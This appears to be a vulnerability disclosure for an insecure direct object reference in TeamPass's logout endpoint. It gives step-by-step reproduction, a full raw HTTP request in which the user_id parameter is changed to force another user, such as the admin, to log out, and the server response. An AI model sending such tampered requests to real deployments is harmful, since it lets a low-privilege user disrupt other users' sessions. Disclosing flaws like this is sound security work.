Description

IDOR vulnerability allow low level user to log out everyone in the system by changing the user ID.

Proof of Concept

Step 1: Login in as admin

Step 2: Go to user and add an user. Set role to Default.

Step 3: Login as the new user.

Step 4: Logout the user

GET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Change the user_id to any other id. For this example, we use 1 as admin user_id

Below is the response of the request submitted at above.

HTTP/1.1 200 OK
Date: Tue, 28 Feb 2023 07:25:00 GMT
Server: Apache/2.4.54 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 526
Connection: close
Content-Type: text/html; charset=utf-8


    <script type="text/javascript" src="../../plugins/store.js/dist/store.everything.min.js"></script>
    <script language="javascript" type="text/javascript">
    
    </script>

Step 5: Admin has logged out